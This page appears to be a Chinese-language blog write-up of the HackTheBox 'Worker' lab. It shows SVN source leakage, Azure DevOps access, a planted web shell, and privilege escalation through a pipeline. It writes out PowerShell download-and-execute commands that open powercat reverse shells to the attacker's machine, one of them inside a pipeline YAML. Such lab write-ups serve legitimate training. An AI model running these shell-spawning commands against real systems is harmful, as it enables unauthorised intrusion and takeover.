<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"fre4k5en.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>
<meta name="description" content="title: proxychains代理date: 2021-11-04 16:11:49tags: Tools Gathering information  Subversion(SVN) 是一个开源的版本控制系統, 也就是说 Subversion 管理着随时间改变的数据。 这些数据放置在一个中央资料档案库(repository) 中。 这个档案库很像一个普通的文件服务器, 不过它会记住每一次文">
<meta property="og:type" content="article">
<meta property="og:title" content="proxychains代理">
<meta property="og:url" content="https://fre4k5en.com/2021/11/04/HackTheBox-Worker/index.html">
<meta property="og:site_name" content="最后的家">
<meta property="og:description" content="title: proxychains代理date: 2021-11-04 16:11:49tags: Tools Gathering information  Subversion(SVN) 是一个开源的版本控制系統, 也就是说 Subversion 管理着随时间改变的数据。 这些数据放置在一个中央资料档案库(repository) 中。 这个档案库很像一个普通的文件服务器, 不过它会记住每一次文">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glxntkr6ipj30y40hq41i.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glyp9xs7azj30ow09ggoi.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glypfylmv8j31360skwtd.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glyq3wzpbgj311w0n8dhf.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glyq4p16wxj30ow0dwwfa.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glypjauvgbj316e0ggdja.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glysvnw7shj314r0u0avb.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glysx95qjgj31ao0m0nc4.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glyt2fdtu6j31se0u0toz.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glyt51c3anj31s40n4jwd.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glz3of18rij30so0f6dhg.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glz3p7mlk8j31fq0h6407.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glz3y87co2j31ab0u0n50.jpg">
<meta property="og:image" content="https://fre4k5en.me/Users/fre4k5en/Library/Application%20Support/typora-user-images/image-20201224181600403.png">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glz44x9ro2j30rg0aajt0.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glz47435zej31h50u0gqg.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwgy1glzaegbf7bj30d00b4q3l.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwgy1glzafnuhfaj311k0jw41m.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwgy1glzalrpmhjj30y009k75j.jpg">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glzwynazxpj30xw0bwjsk.jpg">
<meta property="article:published_time" content="2021-11-04T08:11:49.000Z">
<meta property="article:modified_time" content="2021-11-04T09:37:46.824Z">
<meta property="article:author" content="Fre4k5en">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tva1.sinaimg.cn/large/0081Kckwly1glxntkr6ipj30y40hq41i.jpg">


<link rel="canonical" href="https://fre4k5en.com/2021/11/04/HackTheBox-Worker/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://fre4k5en.com/2021/11/04/HackTheBox-Worker/","path":"2021/11/04/HackTheBox-Worker/","title":"proxychains代理"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>proxychains代理 | 最后的家</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">最后的家</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Fre4k5en's Shelter</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Gathering-information"><span class="nav-text">Gathering information</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#svn%E6%BA%90%E7%A0%81%E6%B3%84%E6%BC%8F-%E7%89%88%E6%9C%AC%E5%9B%9E%E9%80%80"><span class="nav-text">svn源码泄漏+版本回退</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Azure-Devops-getshell"><span class="nav-text">Azure Devops getshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#get-userflag"><span class="nav-text">get userflag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#root-flag"><span class="nav-text">root flag</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%95%E7%94%A8"><span class="nav-text">引用</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Fre4k5en"
      src="https://cdn.jsdelivr.net/gh/Fre4k5en/BlogAssets/logo.jpeg">
  <p class="site-author-name" itemprop="name">Fre4k5en</p>
  <div class="site-description" itemprop="description">我的朋友好像都是网上的那些人，现实中不爱理人也没有人理我。有一天妈妈突然问我，万一有一天网络消失了，你该怎么办？那一刻我如醍醐灌顶，想通了很多事情。原来我人生中最重要的使命，就是保护互联网，不让它消失。</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/fre4k5en" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;fre4k5en" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:fre4k5en@gmail.com" title="E-Mail → mailto:fre4k5en@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://fre4k5en.com/2021/11/04/HackTheBox-Worker/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://cdn.jsdelivr.net/gh/Fre4k5en/BlogAssets/logo.jpeg">
      <meta itemprop="name" content="Fre4k5en">
      <meta itemprop="description" content="我的朋友好像都是网上的那些人，现实中不爱理人也没有人理我。有一天妈妈突然问我，万一有一天网络消失了，你该怎么办？那一刻我如醍醐灌顶，想通了很多事情。原来我人生中最重要的使命，就是保护互联网，不让它消失。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="最后的家">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          proxychains代理
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2021-11-04 16:11:49 / Modified: 17:37:46" itemprop="dateCreated datePublished" datetime="2021-11-04T16:11:49+08:00">2021-11-04</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>title: proxychains代理<br>date: 2021-11-04 16:11:49<br>tags: Tools</p>
<h3 id="Gathering-information"><a href="#Gathering-information" class="headerlink" title="Gathering information"></a>Gathering information</h3><p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glxntkr6ipj30y40hq41i.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glxntkr6ipj30y40hq41i.jpg" alt="img"></a></p>
<blockquote>
<p>Subversion(SVN) 是一个开源的版本控制系統, 也就是说 Subversion 管理着随时间改变的数据。 这些数据放置在一个中央资料档案库(repository) 中。 这个档案库很像一个普通的文件服务器, 不过它会记住每一次文件的变动。 这样你就可以把档案恢复到旧的版本, 或是浏览文件的变动历史。</p>
</blockquote>
<blockquote>
<p><strong>svnserve</strong>是一个轻型的服务器，可以同客户端通过在TCP/IP基础上的自定义有状态协议通讯，客户端通过使用开头为<code>svn://</code>或者<code>svn+ssh://</code><strong>svnserve</strong>的URL来访问一个<strong>svnserve</strong>服务器。这一小节将会解释运行<strong>svnserve</strong>的不同方式，客户端怎样实现服务器的认证，怎样配置版本库恰当的访问控制。</p>
</blockquote>
<span id="more"></span>

<h3 id="svn源码泄漏-版本回退"><a href="#svn源码泄漏-版本回退" class="headerlink" title="svn源码泄漏+版本回退"></a>svn源码泄漏+版本回退</h3><p>通过kali下键入命令</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">svn checkout svn:<span class="regexp">//</span><span class="number">10.129</span>.<span class="number">52.76</span> ./worker</span><br></pre></td></tr></table></figure>

<p>远程服务器受svn管理的源码文件同步到本地worker文件夹</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glyp9xs7azj30ow09ggoi.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glyp9xs7azj30ow09ggoi.jpg" alt="image-20201224094320420"></a></p>
<p>隐藏文件夹.svn下wc.db为sqlite数据库文件，使用dbeaver等工具打开</p>
<p>NODES表下为svn服务器中的文件，PRISTINE表下为文件名的加密值</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glypfylmv8j31360skwtd.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glypfylmv8j31360skwtd.jpg" alt="image-20201224094907150"></a></p>
<p>这里没想到有什么利用的点</p>
<p>moved.txt告诉我们最新版本被移动到了devops.worker.htb</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glyq3wzpbgj311w0n8dhf.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glyq3wzpbgj311w0n8dhf.jpg" alt="image-20201224101208811"></a></p>
<p><a target="_blank" rel="noopener" href="http://devops.woker.htb需要账号密码登录/">http://devops.woker.htb需要账号密码登录</a></p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glyq4p16wxj30ow0dwwfa.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glyq4p16wxj30ow0dwwfa.jpg" alt="image-20201224101253954"></a></p>
<p>论坛中有人跟我在同一个地方卡住了，根据回答，百度了下svn命令</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glypjauvgbj316e0ggdja.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glypjauvgbj316e0ggdja.jpg" alt="image-20201224095220016"></a></p>
<p>注意到svn拥有 update/commit/add/delete等方法，尝试增加或更改远程文件</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">svn <span class="built_in">log</span> svn:<span class="comment">//10.129.52.76 -v</span></span><br></pre></td></tr></table></figure>

<p>查看版本改动详细信息</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glysvnw7shj314r0u0avb.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glysvnw7shj314r0u0avb.jpg" alt="image-20201224114800996"></a></p>
<p>可以看到有一个部署用的ps1被删除了，这时候我们本地使用update回滚到版本r2</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="attribute">svn</span> update -r r<span class="number">2</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glysx95qjgj31ao0m0nc4.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glysx95qjgj31ao0m0nc4.jpg" alt="image-20201224114932684"></a></p>
<h3 id="Azure-Devops-getshell"><a href="#Azure-Devops-getshell" class="headerlink" title="Azure Devops getshell"></a>Azure Devops getshell</h3><p>得到部署时使用的账户，尝试去devops.worker.htb登录，成功</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glyt2fdtu6j31se0u0toz.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glyt2fdtu6j31se0u0toz.jpg" alt="image-20201224115430667"></a></p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glyt51c3anj31s40n4jwd.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glyt51c3anj31s40n4jwd.jpg" alt="image-20201224115701705"></a></p>
<p>这里踩了很多坑：</p>
<p>1.默认的repo是SmartHotel我们需要换成别的库</p>
<p>2.换成dimension库（因为之前svn里面测试用这个库，比较眼熟）之后，传上去的shell一直是404，但404的页面和真正不存在的URL404页面还是有区别的</p>
<p>我确认上传之后看到的404：</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glz3of18rij30so0f6dhg.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glz3of18rij30so0f6dhg.jpg" alt="image-20201224180135976"></a></p>
<p>真正的404：</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glz3p7mlk8j31fq0h6407.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glz3p7mlk8j31fq0h6407.jpg" alt="image-20201224180224358"></a></p>
<p>这里我也不知道为什么猜想应该是dimension.worker.htb库还不够完善吧，或者是作者想让我们换别的库上传</p>
<p>总之，接下来git一整套pr操作</p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="symbol">git</span> checkout -<span class="keyword">b</span> worker</span><br><span class="line"><span class="symbol">git</span> <span class="keyword">add</span> .</span><br><span class="line"><span class="symbol">git</span> commit -m <span class="string">&quot;update&quot;</span></span><br><span class="line"><span class="symbol">git</span> <span class="keyword">push</span> origin worker</span><br></pre></td></tr></table></figure>

<p>可以看到已经可以进行pull request操作了</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glz3y87co2j31ab0u0n50.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glz3y87co2j31ab0u0n50.jpg" alt="image-20201224181103990"></a></p>
<p>可以看到已经上传成功</p>
<p>[<img src="https://fre4k5en.me/Users/fre4k5en/Library/Application%20Support/typora-user-images/image-20201224181600403.png" alt="image-20201224181600403">](<a target="_blank" rel="noopener" href="https://fre4k5en.me/Users/fre4k5en/Library/Application">https://fre4k5en.me/Users/fre4k5en/Library/Application</a> Support/typora-user-images/image-20201224181600403.png)</p>
<p>这里还有一个坑，但其实作者已经在提示我们了，restorer恢复者用户会每隔十分钟重制所有库的内容，这样我们的shell就断了</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glz44x9ro2j30rg0aajt0.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glz44x9ro2j30rg0aajt0.jpg" alt="image-20201224181729935"></a></p>
<p>我这里选择传上shell之后在分支里选择锁定</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glz47435zej31h50u0gqg.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glz47435zej31h50u0gqg.jpg" alt="image-20201224181936388"></a></p>
<h3 id="get-userflag"><a href="#get-userflag" class="headerlink" title="get userflag"></a>get userflag</h3><p>ok，连接蚁剑，开始翻文件</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwgy1glzaegbf7bj30d00b4q3l.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwgy1glzaegbf7bj30d00b4q3l.jpg" alt="image-20201224215414861"></a></p>
<p>找到passwd文件，里面有很多账户密码信息，其中只有一个是users文件夹里面见过的，robisl</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwgy1glzafnuhfaj311k0jw41m.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwgy1glzafnuhfaj311k0jw41m.jpg" alt="image-20201224215524780"></a></p>
<p>这里先用powershell反弹回一个shell，再切换用户执行cmd</p>
<p>在上传powercat.ps1时发现没有权限，这里我们使用powershell下载加载执行</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="attribute">powershell</span> IEX (New-Object System.Net.Webclient).DownloadString(&#x27;http://<span class="number">10.10.14.33</span>/powercat.ps<span class="number">1</span>&#x27;); powercat -c <span class="number">10.10.14.33</span> -p <span class="number">9999</span> -e cmd</span><br></pre></td></tr></table></figure>

<p>本地监听9999得到shell</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">runas <span class="regexp">/noprofile /u</span>ser:robisl cmd</span><br></pre></td></tr></table></figure>

<p>但是输入密码的地方一闪而过，只能想别的办法了</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwgy1glzalrpmhjj30y009k75j.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwgy1glzalrpmhjj30y009k75j.jpg" alt="image-20201224220117076"></a></p>
<p>使用evil-winrm连接，得到robisl的shell，userflag在桌面文件夹里</p>
<p><a target="_blank" rel="noopener" href="https://tva1.sinaimg.cn/large/0081Kckwly1glzwynazxpj30xw0bwjsk.jpg"><img src="https://tva1.sinaimg.cn/large/0081Kckwly1glzwynazxpj30xw0bwjsk.jpg" alt="image-20201225105450219"></a></p>
<h3 id="root-flag"><a href="#root-flag" class="headerlink" title="root flag"></a>root flag</h3><p>这里尝试了winpeas、powerup等脚本，都没有什么能利用的点，systeminfo是没有权限执行的，看了论坛，提示说要回去看看，使用robisl账号登录devops，依旧看不出有什么利用的地方，这里又作弊了，看了群里大哥的writeup，发现是需要自己写一个pipeline（管道？）我理解的大概意思应该是写一个管道连接协议，类似ssh隧道？真的搞不懂了</p>
<p>这里照抄大哥的writeup</p>
<blockquote>
<p>在下面路径 New Pipeline &gt; Azure Repos Git &gt; PartsUnlimited &gt; Starter Pipeline 新建一个pipeline，在pipeline的编辑界面需要删除</p>
<figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="symbol">pool:</span> <span class="comment">&#x27;Default&#x27;</span></span><br></pre></td></tr></table></figure>

<p>因为在服务器环境下并没有这个pool，从而会导致运行失败，最后在 -script 这一行换成我们自己的命令，如下：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">trigger:</span><br><span class="line"></span><br><span class="line">- master</span><br><span class="line"></span><br><span class="line">steps:</span><br><span class="line"></span><br><span class="line">- script: powershell IEX (New-Object System.<span class="keyword">Net</span>.Webclient).DownloadString(&#x27;http:<span class="comment">//10.10.16.4:8899/powercat.ps1&#x27;); powercat -c 10.10.16.4 -p 9988 -e cmd</span></span><br><span class="line">  displayName: &#x27;<span class="keyword">Run</span> a <span class="keyword">one</span>-<span class="keyword">line</span> script&#x27;</span><br><span class="line"></span><br><span class="line">- script: |</span><br><span class="line">  echo Add other tasks to build, <span class="keyword">test</span>, and deploy your project.</span><br><span class="line">  echo See https:<span class="comment">//aka.ms/yaml</span></span><br><span class="line">  displayName: &#x27;<span class="keyword">Run</span> a multi-<span class="keyword">line</span> script&#x27;</span><br></pre></td></tr></table></figure>

<p>本地起个nc监听就可以获取到system的shell了，成功get root shell！</p>
</blockquote>
<p>到此为止确实是拿到了system权限，但还是有问题，我们看flag的速度必须快，要不然1～2分钟后我们的管道又会被删除，导致shell断开，很麻烦，我想应该可以在get system之后再单独powercat弹一个shell回来，应该就解决了。</p>
<p>从初识svn服务到拿到azure devops账号，再学习git push，再到最简单的图形化界面pull requests，最后利用编写piplines功能get system，要不是有别人帮助，自己还真搞不来。以后要学习的还有很多啊。。。</p>
<h3 id="引用"><a href="#引用" class="headerlink" title="引用"></a>引用</h3><p>HackTheBox—Worker <a target="_blank" rel="noopener" href="https://chen1sheng.github.io/2020/11/11/%E9%9D%B6%E6%9C%BAs/worker/">https://chen1sheng.github.io/2020/11/11/%E9%9D%B6%E6%9C%BAs/worker/</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Writeup/" rel="tag"># Writeup</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/11/04/proxychains%E4%BB%A3%E7%90%86/" rel="prev" title="proxychains代理">
                  <i class="fa fa-chevron-left"></i> proxychains代理
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/11/04/CVE-2021-3156%E5%A4%8D%E7%8E%B0/" rel="next" title="CVE-2021-3156复现">
                  CVE-2021-3156复现 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fre4k5en</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
